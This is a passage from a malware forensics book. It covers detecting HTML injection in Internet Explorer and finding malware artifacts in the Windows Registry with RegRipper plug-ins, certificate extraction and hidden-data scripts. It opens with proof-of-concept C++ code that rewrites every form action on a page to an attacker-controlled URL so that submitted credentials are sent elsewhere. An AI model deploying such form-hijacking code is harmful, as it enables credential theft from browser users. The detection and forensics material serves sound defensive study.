        bRet = TRUE;
    }

    SysFreeString(bstrUrl);
    return bRet;
}

BOOL ReplaceForms(IHTMLDocument2 *doc)
{
    HRESULT hr;
    IHTMLElementCollection *forms;
    IHTMLFormElement *element;
    IDispatch *theform;
    VARIANT vEmpty;
    VARIANT vIndexForms;
    LONG CountForms;
    BOOL bRet = FALSE;
    BSTR bstrEvil = SysAllocString(L"");   // attacker-controlled URL

    // query for the doc's forms
    hr = doc->get_forms((IHTMLElementCollection**)&forms);

    if (hr != S_OK || !forms) {
        SysFreeString(bstrEvil);
        return FALSE;
    }

    // loop for each form in the doc
    CountForms = 0;
    forms->get_length(&CountForms);

    for (int j=0; j<CountForms; j++)
    {
        theform = NULL; element = NULL;

        VariantInit(&vEmpty);
        VariantInit(&vIndexForms);
        vIndexForms.vt = VT_I4;
        vIndexForms.lVal = j;

        // get the form
        hr = forms->item(vIndexForms, vEmpty, (IDispatch**)&theform);
        if (hr != S_OK || !theform) {
            continue;
        }

        // get the form element
        hr = theform->QueryInterface(IID_IHTMLFormElement,
                                     (void **)&element);
        if (hr == S_OK && element) {
            // replace the form action with a malicious URL
            hr = element->put_action(bstrEvil);
            if (hr == S_OK) {
                bRet = TRUE;
            }
            element->Release();
        }
        theform->Release();
    }

    forms->Release();
    SysFreeString(bstrEvil);
    return bRet;
}


Detecting HTML Injection on Live Machines

API hooking is a simple and effective approach to HTML injection, but it is easy to detect. Any anti-rootkit scanner can list which functions are hooked, and there aren’t many legitimate reasons to hook InternetReadFile and HttpSendRequest. DOM modification is a bit trickier because it doesn’t hook any functions. That said, regardless of whether malware uses API hooking or DOM modification, the changes (injected HTML) are only reflected in the memory of the browser process. If the browser caches the web page, then there will be a file in the Temporary Internet Files folder that contains an original copy of the page content.

Take a look at Figure 10-7, which shows the appearance of a browser after conducting the DOM modification attack. If you choose View ⇒ Source in the browser, IE accesses the cached page from disk rather than from memory. Therefore, by viewing the HTML source in this manner, you cannot tell if the browser’s view of the page has been altered. Notice how the source still indicates that the form will POST data to checklogin.php.

To detect HTML injection, we developed a tool that you can find on the book’s DVD named HTMLInjectionDetector.exe. It works in the following manner:

1. You run HTMLInjectionDetector.exe on a machine you suspect to be infected. Call it from the command line and pass it a text file that contains the list of websites that you want to check.

2. The program starts a new Internet Explorer process for each website, navigates to the specified URL, and waits for the URL you specified to finish loading. It waits an additional few seconds to let any malware on the system perform the HTML injection.

Figure 10-7: When you view the source in IE, the content comes from the cache file.


3. The program accesses the browser’s DOM (using the same APIs as shown in the sample malicious program), but instead of making modifications, it just dumps a copy of the page’s contents to a file. The file will exist in your working directory with a _dom.txt extension.

4. The program checks to see if the browser cached a copy of the page for your specified URL using the GetUrlCacheEntryInfo API. If so, it copies the cached file from the Temporary Internet Files folder to your working directory with a _cache.txt extension.

5. The program takes a screenshot of the IE window and saves it in your working directory (so you can see how the HTML appeared in a browser).

Here is an example of how to use the HTMLInjectionDetector.exe program:

C:\>HTMLInjectionDetector.exe -h

 Usage: HTMLInjectionDetector.exe [OPTIONS]


  -h           show this message and exit

  -f <FILE>    text file with URLs to check

  -s           save screen shots (default=no)

 [ERROR] You must supply a file with URLs!

 C:\>echo > urls.txt

C:\>HTMLInjectionDetector.exe -f urls.txt -s

 Requested URL:

Redirect URL:

Navigate completed. Waiting 3 seconds.

Dumped 425 bytes of page content to www.1234.org_dom.txt

Cache file: C:\Documents and Settings\Administrator\

   Local Settings\Temporary Internet Files\Content.IE5\Z7N9YX3C\login[1].htm

Copied to: www.1234.org_cache.txt

Saved BMP to

Now you should have the following three files:

·           www.1234.org_dom.txt: A copy of the HTML as displayed in the IE browser

·           www.1234.org_cache.txt: A copy of the HTML as originally returned by the web server

·  A screen shot of the browser’s display of the visited URL

Figure 10-8 shows that you can easily determine modifications to the page by exploring the contents of the files.

Figure 10-8: Comparing the DOM and cached file view shows a discrepancy.
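The comparison of the two dumped files can also be automated. The following Python sketch is not part of HTMLInjectionDetector.exe; it only illustrates one way to diff the cached copy against the DOM copy and to list form actions that differ. The page contents and host names are hypothetical stand-ins for the _cache.txt and _dom.txt files.

```python
import difflib
from html.parser import HTMLParser
from itertools import zip_longest


class FormActionParser(HTMLParser):
    """Collects the action attribute of every <form> tag."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action", ""))


def form_actions(html):
    """Return the list of form action URLs found in an HTML string."""
    parser = FormActionParser()
    parser.feed(html)
    return parser.actions


def compare_pages(cache_html, dom_html):
    """Return (changed form actions, unified diff lines) for two pages."""
    # zip_longest also reports forms that exist in only one of the copies
    changed = [
        (old, new)
        for old, new in zip_longest(form_actions(cache_html),
                                    form_actions(dom_html))
        if old != new
    ]
    diff = list(difflib.unified_diff(
        cache_html.splitlines(), dom_html.splitlines(),
        fromfile="cache", tofile="dom", lineterm=""))
    return changed, diff


# Hypothetical contents standing in for the two files written by the tool
cache_html = ('<html><body>\n'
              '<form action="https://bank.example/login" method="post">\n'
              '</form>\n</body></html>')
dom_html = ('<html><body>\n'
            '<form action="http://evil.example/steal" method="post">\n'
            '</form>\n</body></html>')

changed, diff = compare_pages(cache_html, dom_html)
for old, new in changed:
    print("form action changed: %s -> %s" % (old, new))
print("\n".join(diff))
```

Keep in mind that a browser may normalize markup when it serializes the DOM, so a raw line diff can contain harmless noise. Comparing specific attributes, such as form actions, tends to be a more reliable signal.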


As we have shown, even if you know exactly how a website should appear in your browser, and if you double-check the validity of form actions and other page variables by viewing the page source, there’s still a possibility that malware could have modified the browser. The attack that we conducted for demonstration purposes is obviously just a proof-of-concept. If attackers replaced forms on an HTTPS website so that it POSTs data to an HTTP website, the user would likely see a prompt or warning. However, we’ve also seen malware that disables such warnings by setting the error mode in Internet Explorer.



Registry Analysis

In our opinion, the Registry is like an ocean: no one person has explored it all, or ever will. However, slowly but surely, in conjunction with others in the community, you can identify key locations in the Registry to search for artifacts left by intruders and malicious code. The next few recipes show you some of the tools and techniques that you can add to your arsenal of knowledge about the Registry.

Recipe 10-8: Registry Forensics with RegRipper Plug-ins


You can find supporting material for this recipe on the companion DVD.

Harlan Carvey’s RegRipper25 is a Registry forensics framework that allows you to quickly extract keys, values, data, and timestamps from an offline hive file. It is written in Perl and based on the Parse::Win32Registry module by James McFarlane. RegRipper is very different from a Registry viewer/editor such as Regedit. For one, RegRipper is not intended to work against a live system’s Registry hives. You must first copy off the Registry hives from a suspect system in order to examine them with RegRipper. Second, in Harlan’s own words, you wouldn’t use RegRipper to leisurely “look around” in the Registry. Instead, RegRipper is based on plug-ins that are hard-coded to extract data from specific locations.

RegRipper Plug-ins

RegRipper comes with over 75 plug-ins. To get a list of available plug-ins, just run RegRipper on the command line with the -l flag. For the sake of brevity, we’re not going to list them all; however, Table 10-1 shows a few that we think are especially useful in malware-related investigations.

Table 10-1: A Few RegRipper Plug-ins

Plug-in Name





Prints the contents of the AppInit_DLLs value. Any DLLs listed here automatically load into GUI applications (more specifically, into any processes that load user32.dll).



Prints details on the installed Browser Helper Objects (modules that load into Internet Explorer)



Prints details on the Windows host firewall



Prints information on the Image File Execution Options, which malware often sets to disable antivirus programs. For a reference, see the malware we analyzed in Recipe 9-3.



Dumps the entire hive and sorts the keys by LastWrite timestamp



Lists details of installed services, including the path to the service binary



Prints information on the automatically starting applications



Prints the contents of the Userinit value (Zeus modifies this value with a path to its own executable so that it launches after winlogon.exe but before Explorer.exe.)

Note Because RegRipper is written in Perl, you can use it on any platform where Perl runs. Harlan also provides compiled Windows executables (rip.exe) for use on Windows systems without a Perl interpreter.

The following examples should give you a solid idea of how to use RegRipper and how to start writing your own plug-ins. You can find the full source code for all plug-ins in this recipe (and a few additional ones) on the book’s DVD. Just place them in your “plugins” directory to make them available to RegRipper.

Viewing Static Routes

This example, the simplest case, shows how to enumerate values in a key. The objective is to investigate malware that modifies a system’s IP routing table. Some samples we’ve seen in the past dropped and executed a batch file containing several hundred route add commands like this:

route -p add mask

By default, routes added with the route command are not preserved when the TCP/IP protocol is restarted. To change this behavior, the attackers used the -p flag, which makes the routes persistent. In this case, the routing information is saved in the Registry and will initialize each time TCP/IP starts. To see if any persistent routes have been set on your suspect system, you can look in the system hive under the following key: HKLM\System\ControlSet001\Services\Tcpip\Parameters\PersistentRoutes. The name of each value under this key is a comma-separated list in the format network,netmask,gateway,metric.

The following code shows the body of the plug-in that extracts data regarding persistent routes.

sub pluginmain {
    my $class = shift;
    my $hive = shift;
    ::logMsg("Launching routes v.".$VERSION);
    my $reg = Parse::Win32Registry->new($hive);
    my $root_key = $reg->get_root_key;
    # Path is relative to the root of the system hive
    my $key_path = 'ControlSet001\\Services\\Tcpip\\Parameters\\PersistentRoutes';
    my $key;
    if ($key = $root_key->get_subkey($key_path)) {
        ::rptMsg($key_path);
        ::rptMsg("LastWrite Time ".gmtime($key->get_timestamp())." (UTC)");
        # Each value name has the form network,netmask,gateway,metric
        my @vals = $key->get_list_of_values();
        foreach my $v (@vals) {
            my $name = $v->get_name();
            my @f = split(/,/, $name);
            ::rptMsg("$f[0] mask $f[1] gateway $f[2] metric $f[3]");
        }
    }
    else {
        ::rptMsg($key_path." not found.");
        ::logMsg($key_path." not found.");
    }
}



The commands that follow provide an example of using the routes plug-in. When you see persistent routes, don’t immediately deem the machine infected, because they could be legitimate. Use one of the techniques for researching IPs and networks from Chapter 5 and determine if the machine with the routes has any business communicating with the remote systems.

perl -r system -p routes

Launching routes v.20100809



LastWrite Time Tue Jun 22 15:02:22 2010 (UTC)

 xx.140.225.0 mask gateway metric 1

xx.236.0.0 mask gateway metric 1

xx.23.206.0 mask gateway metric 1

xx.191.13.0 mask gateway metric 1

xx.184.71.0 mask gateway metric 1

xx.12.57.0 mask gateway metric 1

xx.102.130.0 mask gateway metric 1
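Once you have the route list, a natural follow-up question is whether a specific address (for example, an antivirus update server) falls inside one of the rerouted networks. The Python sketch below is only an illustration and is not part of RegRipper; it parses value names in the network,netmask,gateway,metric format described earlier. The addresses are hypothetical and come from the reserved documentation ranges.

```python
import ipaddress


def parse_route(value_name):
    """Split a PersistentRoutes value name into its four fields."""
    network, netmask, gateway, metric = value_name.split(",")
    return {
        # strict=False tolerates network fields that have host bits set
        "network": ipaddress.IPv4Network("%s/%s" % (network, netmask),
                                         strict=False),
        "gateway": ipaddress.IPv4Address(gateway),
        "metric": int(metric),
    }


def routes_covering(value_names, ip):
    """Return the parsed routes whose network contains the given IP."""
    target = ipaddress.IPv4Address(ip)
    return [r for r in map(parse_route, value_names)
            if target in r["network"]]


# Hypothetical value names, not taken from a real case
names = [
    "198.51.100.0,255.255.255.0,192.0.2.1,1",
    "203.0.113.0,255.255.255.0,192.0.2.1,1",
]

hits = routes_covering(names, "203.0.113.25")
for r in hits:
    print("%s via %s metric %d" % (r["network"], r["gateway"], r["metric"]))
```

A hit does not prove malicious intent by itself, but a persistent route that sends a security vendor's address range to an unreachable gateway deserves a closer look.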

Examining Pending Deletions

This example shows how to handle special cases where the Registry value’s data contains multiple NULL-terminated strings.

Malware often watches over its files and re-creates them if you, or antivirus programs, try to remove them from the disk. If you’re trying to disinfect a system, but the file just won’t go away, you can ask the system to automatically delete it at the next reboot. To do this, pass MOVEFILE_DELAY_UNTIL_REBOOT as the dwFlags parameter to MoveFileEx, and leave the name of the new file NULL, like this:

MoveFileEx(
    "C:\\Temp\\dropper.exe",       // lpExistingFileName
    NULL,                          // lpNewFileName
    MOVEFILE_DELAY_UNTIL_REBOOT);  // dwFlags



MoveFileEx adds the file name(s) to a Registry value in the System hive. In particular, it adds them to the PendingFileRenameOperations value under HKLM\System\ControlSet001\Control\Session Manager. At the next reboot, the session manager (smss.exe) queries the Registry value and deletes (or moves) any files that it finds. Because smss.exe is the first user mode process to begin running, it can complete the actions without interference from other processes (keep in mind that kernel drivers can load before smss.exe and cause interference).

Note The Sysinternals tool movefile.exe allows you to delete files using the special parameter to MoveFileEx, and pendmoves.exe allows you to query for any files pending deletion. However, these tools only work on a live Windows system.

As you may have guessed, malware exploits MoveFileEx for its own purposes—typically to get rid of temporary files that it dropped or downloaded. If you encounter a machine that hasn’t been rebooted since the infection, you can examine the PendingFileRenameOperations value for evidence. The data type for this value is REG_MULTI_SZ, which is a series of NULL-terminated strings. Each call to MoveFileEx will result in two strings being added to the value. The first string is the original file name. The second string is the destination file name. If the original file is to be deleted, then the destination file name is an empty string.

The following code shows the body of the plug-in that parses the PendingFileRenameOperations value:

sub pluginmain {
    my $class = shift;
    my $hive = shift;
    ::logMsg("Launching pendingdelete v.".$VERSION);
    my $reg = Parse::Win32Registry->new($hive);
    my $root_key = $reg->get_root_key;
    my $key_path = 'ControlSet001\Control\Session Manager';
    my $key;
    if ($key = $root_key->get_subkey($key_path)) {
        ::rptMsg($key_path);
        ::rptMsg("LastWrite Time ".gmtime($key->get_timestamp())." (UTC)");
        my $val = $key->get_value("PendingFileRenameOperations");
        if ($val) {
            # In list context, get_data() returns one element per
            # NULL-terminated string, so paths with spaces stay intact
            my @strings = $val->get_data();
            for (my $i = 0; $i < scalar(@strings); $i += 2) {
                my $src = $strings[$i];
                my $dst = $strings[$i+1];
                # An empty (or missing) destination means "delete the source"
                $dst = "{delete}" if !defined($dst) || $dst eq "";
                ::rptMsg("[".($i/2)."] $src => $dst");
            }
        }
    }
    else {
        ::rptMsg($key_path." not found.");
        ::logMsg($key_path." not found.");
    }
}



Here is an example of using the pending delete plug-in on an infected machine:

perl -r system.bin -p pendingdelete

Launching pendingdelete v.20100809


ControlSet001\Control\Session Manager

LastWrite Time Tue Jun 22 15:20:09 2010 (UTC)

 [0] \??\C:\WINDOWS\system32\e7s1.exe => {delete}

[1] \??\C:\WINDOWS\system32\7di2.dll => {delete}

[2] \??\C:\WINDOWS\system32\b9d9.dll => {delete}

[3] \??\C:\WINDOWS\TEMP\PRAGMAa3ad.tmp => {delete}

[4] \??\C:\WINDOWS\TEMP\PRAGMAfbfe.tmp => {delete}

As the output shows, five files are scheduled to be deleted at the next reboot. You can use this information to find and copy the files off the victim machine, or to check whether other machines have similarly named files.
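If you have the raw bytes of the value rather than a parsed list, the source/destination pairing can be reconstructed by hand. The Python sketch below is an illustration only, under the assumption that the data is UTF-16LE with one NULL after each string and usually one extra NULL that ends the list. The function name and the second sample entry (a rename with spaces in its path) are hypothetical.

```python
def parse_pending_renames(raw):
    """Decode raw REG_MULTI_SZ bytes into (source, destination) pairs."""
    text = raw.decode("utf-16-le")
    # Remove one trailing NULL: the list terminator, or the terminator of
    # the last string if the writer omitted the list terminator
    if text.endswith("\0"):
        text = text[:-1]
    parts = text.split("\0")
    # A well-formed list has an even number of strings; an odd count with an
    # empty last element is left over from the final string's terminator
    if len(parts) % 2 == 1 and parts[-1] == "":
        parts.pop()
    pairs = []
    for i in range(0, len(parts), 2):
        src = parts[i]
        dst = parts[i + 1] if i + 1 < len(parts) else ""
        pairs.append((src, dst))
    return pairs


# Sample data: one delete (empty destination) followed by one rename
raw = ("\\??\\C:\\WINDOWS\\system32\\e7s1.exe\0\0"
       "\\??\\C:\\Temp\\old name.txt\0\\??\\C:\\Temp\\new name.txt\0"
       "\0").encode("utf-16-le")

pairs = parse_pending_renames(raw)
for src, dst in pairs:
    print("%s => %s" % (src, dst or "{delete}"))
```

Splitting on the NULL separator rather than on spaces keeps paths such as C:\Documents and Settings intact.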

Viewing ShellExecute Extensions

This example shows how to correlate values across Registry keys. The objective is to investigate malware that injects code into other processes by using ShellExecute extensions. The ShellExecute API is similar to CreateProcess in that it can be used to start a new process. Instead of passing ShellExecute the path to an executable, however, you can pass it the path of a file such as C:\info.txt. ShellExecute looks up the default application for handling files with a .txt extension and launches Notepad. In fact, every time you double-click something from Explorer, it results in a call to ShellExecute.

ShellExecute extensions are implemented as DLLs. The DLLs contain user-defined routines for special handling of the objects to be opened or executed. If you click Start ⇒ Run and then enter an object to open, the process calling ShellExecute (Explorer in this case) loads the extension DLL to implement the special handling. Most systems have at least one preinstalled extension that opens a web browser if the object begins with “http:”.

Many malware families install their own ShellExecute extensions just to get a DLL injected into Explorer (and any other process that calls ShellExecute). They perform the install by registering a class ID (CLSID) and then writing the CLSID to a value in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks. The value is a REG_SZ type and it may or may not have any data (data is optional).

The following code shows the plug-in that enumerates the ShellExecute extensions and then looks up the corresponding CLSID under HKLM\Software\Classes\CLSID. This way, you can also print the DLL associated with the extension.

sub getclsid {
    my $root_key = shift;
    my $name = shift;
    my $clsid_path = "Classes\\CLSID\\".$name;
    my $clsid;
    if ($clsid = $root_key->get_subkey($clsid_path)) {
        # The DLL path is the default value of the InprocServer32 subkey
        my $mod = "{empty}";
        my $inproc = $clsid->get_subkey("InprocServer32");
        if ($inproc && $inproc->get_value("")) {
            $mod = $inproc->get_value("")->get_data();
        }
        # The description is the default value of the CLSID key itself
        my $default = $clsid->get_value("");
        my $desc = "{empty}";
        if ($default) {
            $desc = $default->get_data();
        }
        ::rptMsg("Description: $desc");
        ::rptMsg("Module: $mod");
    } else {
        ::rptMsg($clsid_path." not found.");
    }
}

sub pluginmain {
    my $class = shift;
    my $hive = shift;
    ::logMsg("Launching shellexecutehooks v.".$VERSION);
    my $reg = Parse::Win32Registry->new($hive);
    my $root_key = $reg->get_root_key;
    # Path is relative to the root of the software hive
    my $key_path = 'Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks';
    my $key;
    if ($key = $root_key->get_subkey($key_path)) {
        ::rptMsg($key_path);
        ::rptMsg("LastWrite Time ".gmtime($key->get_timestamp())." (UTC)");
        my @vals = $key->get_list_of_values();
        foreach my $v (@vals) {
            # The value name is the CLSID; the data is optional
            my $name = $v->get_name();
            my $data = $v->get_data();
            $data = "{empty}" if !defined($data) || $data eq "";
            ::rptMsg("$name: $data");
            getclsid($root_key, $name);
        }
    } else {
        ::rptMsg($key_path." not found.");
        ::logMsg($key_path." not found.");
    }
}



The following example shows how to use the plug-in. The first entry, for shell32.dll with the description URL Exec Hook, is the legitimate http handler. The second entry, for softqq0.dll with the value data hook dll rising, is malicious. This is interesting because the attackers didn’t need to supply any data (remember, that’s optional), but they entered some anyway, and hook dll rising is hardly a stealthy choice! Microsoft calls this family of malware Taterf.26

perl -r software.bin -p shellexecutehooks

Launching shellexecutehooks v.20100809



LastWrite Time Tue Jun 22 16:45:18 2010 (UTC)

 {AEB6717E-7E19-11d0-97EE-00C04FD91972}: {empty}

Description: URL Exec Hook

Module: shell32.dll

 {B03A4BE6-5E5A-483E-B9B3-C484D4B20B72}: hook dll rising

Description: {empty}

Module: C:\WINDOWS\system32\softqq0.dll
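When you collect this output from many machines, it helps to triage it automatically. The Python sketch below is one possible approach and is not part of RegRipper: it parses report lines in the layout shown above and flags every hook whose CLSID is not on an allowlist. The allowlist contains only the URL Exec Hook CLSID from the output above; a real allowlist would be something you build from known-clean systems.

```python
import re

# CLSIDs considered legitimate (only the URL Exec Hook from the sample output)
KNOWN_GOOD = {"{AEB6717E-7E19-11D0-97EE-00C04FD91972}"}

CLSID_LINE = re.compile(r"^(\{[0-9A-Fa-f-]{36}\}): (.*)$")


def parse_hooks(report):
    """Turn plug-in output into a list of dicts, one per hook."""
    hooks = []
    for line in report.splitlines():
        line = line.strip()
        m = CLSID_LINE.match(line)
        if m:
            hooks.append({"clsid": m.group(1), "data": m.group(2)})
        elif line.startswith("Description: ") and hooks:
            hooks[-1]["description"] = line[len("Description: "):]
        elif line.startswith("Module: ") and hooks:
            hooks[-1]["module"] = line[len("Module: "):]
    return hooks


def suspicious(hooks):
    """Return hooks whose CLSID is not on the allowlist."""
    return [h for h in hooks if h["clsid"].upper() not in KNOWN_GOOD]


report = r"""
LastWrite Time Tue Jun 22 16:45:18 2010 (UTC)
{AEB6717E-7E19-11d0-97EE-00C04FD91972}: {empty}
Description: URL Exec Hook
Module: shell32.dll
{B03A4BE6-5E5A-483E-B9B3-C484D4B20B72}: hook dll rising
Description: {empty}
Module: C:\WINDOWS\system32\softqq0.dll
"""

flagged = suspicious(parse_hooks(report))
for h in flagged:
    print("%s -> %s" % (h["clsid"], h.get("module", "{unknown}")))
```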

As you can see, RegRipper can save you a ton of time during investigations. In fact, the only thing better than a collection of Registry keys/values commonly altered by malware is the ability to check all those locations with one or two commands. See Recipe 18-7 for how to use RegRipper on memory dumps.



Recipe 10-9: Detecting Rogue-Installed PKI Certificates


You can find supporting material for this recipe on the companion DVD.

Public key infrastructure (PKI) establishes trust on the Internet. When you visit an SSL website, your browser checks if the site’s certificate is legitimate by making sure it is signed by a certificate authority (CA) trusted by your browser. To do this, your browser gets the appropriate CA’s public key from your computer’s Registry and performs the validation. Malware can exploit this trust model by installing its own CA certificate that the attackers created so that your computer trusts illegitimate websites. This recipe shows you how to extract certificates from a Registry hive and use OpenSSL for verification.


Sophos has an excellent write-up27 about a malware sample they call TROJ/BHO-QP that installs a fake CA certificate. In the article, they describe how the malware authors performed the following steps:

1. Created a fake VeriSign code signing certificate

2. Used the fake VeriSign certificate to issue a fake Microsoft certificate

3. Signed a malicious DLL with the fake Microsoft certificate

4. Installed the DLL as a Browser Helper Object (BHO) for Internet Explorer on the victim’s machine

5. Installed the fake VeriSign certificate as a trusted root CA on the victim’s machine

As a result of these actions, the victim computer has complete trust in the malicious DLL because it appears to have been signed by Microsoft.

Note If you’re looking for good books on cryptography, we recommend Practical Cryptography by Niels Ferguson and Bruce Schneier for beginners and Applied Cryptography by Bruce Schneier for more advanced readers.

Certificate Registry Entries

Windows stores certificates in several different places in the Registry. Microsoft documented these locations for Windows 2000, XP, and Server 2003 (the locations also apply to Windows 7) in a TechNet article called “Certificates Tools and Settings.”28 The locations of most interest are HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates and HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates. Under these keys, you’ll find the following subkeys:

·           AuthRoot: Non-Microsoft root CA certs

·           ROOT: Trusted root CA certs

·           CA: Intermediate CA certs

·           Disallowed: Rejected or untrustworthy certs

·           trust: Enterprise trust certs

·           TrustedPublisher: Certs explicitly accepted as trusted

·           MY: User’s personal certs

Each subkey has an additional subkey named Certificates, where you’ll find yet another subkey for each installed certificate of the given type. The certificates are stored in a REG_BINARY value named Blob, which contains the actual certificate. The malware that installed a fake VeriSign CA created a value named Blob under HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\ROOT\Certificates\uniqueid. The uniqueid field is either a hash of the certificate or a fingerprint. Figure 10-9 shows how you can view the raw data for one of the trusted root CA certificates.

Figure 10-9: Viewing certificates in the Registry


Extracting Certificates

The Registry stores certificates in DER format with a special Microsoft header. In Figure 10-9, we highlighted the beginning of the DER-encoded certificate in the Blob value. The actual certificate starts at offset 0x84, but this is not consistent across all certificates stored in the Registry. When you export certificates using Windows’ mmc snap-in for certificates or programmatically with PFXExportCertStore, the special header is automatically removed. However, if you pull raw data from the Registry, you have to remove the header yourself. With a bit of research, it should be possible to figure out how to correctly parse the header, but we took the easy way out. Instead of parsing Microsoft’s header, we wrote a Perl regular expression that finds the start of the DER certificate in the binary blob.

The script, which you can find on the book’s DVD, uses Parse::Win32Registry to automate the few steps described. It extracts certificates from a Registry hive file and saves them in a directory on disk. You can control the script with command-line parameters so that it only extracts certain types of certificates, or certificates that have a specified pattern in their subject (i.e., CN or Common Name) field. In addition, the script converts all DER certificates to PEM format so that it can verify them with OpenSSL.
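To make the idea concrete, here is a minimal Python sketch of the same two steps: locating the DER data inside a blob and wrapping it as PEM. It is not the authors' regular expression. It assumes the certificate is a DER SEQUENCE with a two-byte length whose first element is also a SEQUENCE with a two-byte length, which gives the byte pattern 30 82 LL LL 30 82. The header and certificate bytes in the example are placeholders, not a real certificate.

```python
import base64
import re

# Outer SEQUENCE (30 82 + 2 length bytes) followed by an inner SEQUENCE
DER_START = re.compile(rb"\x30\x82(..)\x30\x82", re.DOTALL)


def extract_der(blob):
    """Return the first plausible DER certificate in blob, or None."""
    pos = 0
    while True:
        m = DER_START.search(blob, pos)
        if m is None:
            return None
        length = int.from_bytes(m.group(1), "big")
        end = m.start() + 4 + length      # 4 = tag + 0x82 + 2 length bytes
        if end <= len(blob):              # declared length must fit the blob
            return blob[m.start():end]
        pos = m.start() + 1               # false positive, keep scanning


def der_to_pem(der):
    """Wrap DER bytes in a PEM certificate envelope (64-char lines)."""
    b64 = base64.b64encode(der).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return ("-----BEGIN CERTIFICATE-----\n" + "\n".join(lines) +
            "\n-----END CERTIFICATE-----\n")


# Placeholder data: a made-up header followed by a fake 516-byte "certificate"
header = b"\x03\x00\x00\x00\x01\x00\x00\x00\x14\x00\x00\x00" + b"\xab" * 20
fake_der = b"\x30\x82\x02\x00" + b"\x30\x82\x01\xfc" + bytes(508)
blob = header + fake_der

der = extract_der(blob)
print("certificate starts at offset 0x%x, %d bytes" % (blob.find(der), len(der)))
print(der_to_pem(der).splitlines()[0])
```

Checking the declared length against the blob size filters out many accidental matches, but the sketch can still be fooled by header bytes that happen to resemble a SEQUENCE. Letting OpenSSL parse the resulting PEM file is the real validation step.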

The following is an example usage of the Perl script. First, print the usage:

perl for Parse::Win32Registry 0.51

 Dumps and prints details about installed PKI certificates. <filename> [subject] [-a] [-c] [-r] [-m]

    -a or --all       dump all certs listed below and also:

                           AuthRoot (non Microsoft root CA certs)

                           Disallowed (rejected/untrustworthy)

                           trust certs (enterprise trust certs)

                           TrustedPublisher (certs explicitly accepted)

    -c or --ca        dump CA (intermediate CA certs)

    -r or --root      dump ROOT (trusted root CA certs)

    -m or --my        dump MY (user's personal certs)

Figure 10-10 shows the syntax and output from extracting all ROOT CA certificates with the pattern “verisign class” (case-insensitive) in the subject field. We searched for this particular pattern based on the Sophos report of a malicious VeriSign Class 3 Code Signing certificate.

Figure 10-10: Extracting the malicious certificate with


At first glance, you can’t tell if the certificate in Figure 10-10 is legitimate or not. However, when you compare its attributes with the one reported by Sophos, you quickly see that it’s a match. For example, the fake certificate uses md5WithRSAEncryption as the signature algorithm, whereas the real one uses sha1WithRSAEncryption. If you don’t know in advance which pattern to search for, it is better to dump all certificates with the -a switch and allow OpenSSL to print attributes so you can inspect them in more detail.

Verifying Certs with OpenSSL

When using OpenSSL to verify certificates, you may find that even legitimate ones sometimes show up as self-signed. This is probably because the issuing CA’s public key is not available to OpenSSL. On Ubuntu, you can type apt-get install ca-certificates to install many of the common CAs’ public keys on your machine. You’ll end up with over 200 individual certificates in /etc/ssl/certs and one PEM-formatted file in /etc/ssl/certs/ca-certificates.crt with all the certificates combined. Then you can either pass the directory to openssl with -CApath or pass the file to openssl with -CAfile. For more information, see Richard Bejtlich’s blog post on Using Root Certificates with OpenSSL on FreeBSD.29




Recipe 10-10: Examining Malware that Leaks Data into the Registry


You can find supporting material for this recipe on the companion DVD.

When an application uses RegSetValue or RegSetValueEx, it specifies the type of data being written to the Registry. Some acceptable data types include NULL-terminated strings (REG_SZ), multiple NULL-terminated strings (REG_MULTI_SZ), binary data (REG_BINARY), and unsigned longs (REG_DWORD). Tools, such as Regedit, format data according to the specified data type so that it’s easier to read. An issue arises when malware inserts binary data, but says it’s a REG_SZ type. In this case, Regedit treats the data as a string and displays only the characters up to the first NULL-terminating byte. Thus, it’s possible to hide data “behind” a string in the Registry.

This recipe shows you how to find binary data that’s disguised as a string. There are two main reasons you’ll find these types of artifacts. The most obvious is because of malware that intentionally writes binary data to a Registry value and specifies a type of REG_SZ. The less obvious, although much more intriguing, reason is that sometimes malware writes binary data to a REG_SZ type value by accident. This can happen if malware intends to write a NULL-terminated string but specifies that the string’s length is much larger than it actually is. Thus, RegSetValueEx loads the string and the excess bytes that exist in memory after the string. What you essentially have is a bug in the malware that leaks volatile data (which can contain clues about the program’s run-time state) into a more permanent storage area, such as the Registry.
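The check itself is simple once you have the raw bytes of a REG_SZ value. The following Python sketch is an illustration under our own assumptions and is not the script from the DVD: it treats the data as UTF-16LE, finds the first NULL terminator, and reports whatever follows it. The function names and sample bytes are hypothetical.

```python
def split_reg_sz(raw):
    """Split raw REG_SZ bytes into (visible string, bytes after terminator)."""
    # Walk the data one 16-bit code unit at a time
    for off in range(0, len(raw) - 1, 2):
        if raw[off:off + 2] == b"\x00\x00":
            visible = raw[:off].decode("utf-16-le", errors="replace")
            return visible, raw[off + 2:]
    # No terminator at all: everything is part of the string
    return raw.decode("utf-16-le", errors="replace"), b""


def has_hidden_data(raw):
    """True if any non-zero byte follows the first NULL terminator."""
    _, hidden = split_reg_sz(raw)
    return any(hidden)


# Hypothetical value: the string "1.0", a terminator, then four stray bytes
raw = "1.0".encode("utf-16-le") + b"\x00\x00" + b"\xde\xad\xbe\xef"

visible, hidden = split_reg_sz(raw)
print("Regedit would show: %r" % visible)
print("Hidden behind it:   %s" % hidden.hex())
```

Ignoring all-zero padding after the terminator avoids flagging values that were merely written with a generous, but zeroed, buffer.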

Puzlpman and Mozipowp30 are examples of malware that accidentally leak information into the Registry. To demonstrate the concept, we installed a variant of Mozipowp onto a test machine. In Figure 10-11, you can see the values it creates under HKEY_CURRENT_USER\Identities. You would never know by the Regedit display, but there is a significant amount of binary data hiding behind the Curr version, Inst Date, Last Date, Popup count, Popup date, and Popup time values.

Figure 10-11: Examining the Mozipowp Registry entries in regedit



On the DVD that accompanies this book, you can find a Perl script called (we couldn’t think of a more descriptive name). This script is based on Parse::Win32Registry and it can help you identify binary data disguised as strings. It recursively searches through all keys, so you don’t have to preemptively know where to look. To test the script, we copied off the user’s NTUSER.DAT file from the Mozipowp-infected machine for examination and used the following commands. Notice that you can use the same script to find base64-encoded strings, PE files, dot-quad IP addresses, and HTTP URLs anywhere in the Registry.

perl for Parse::Win32Registry 0.51

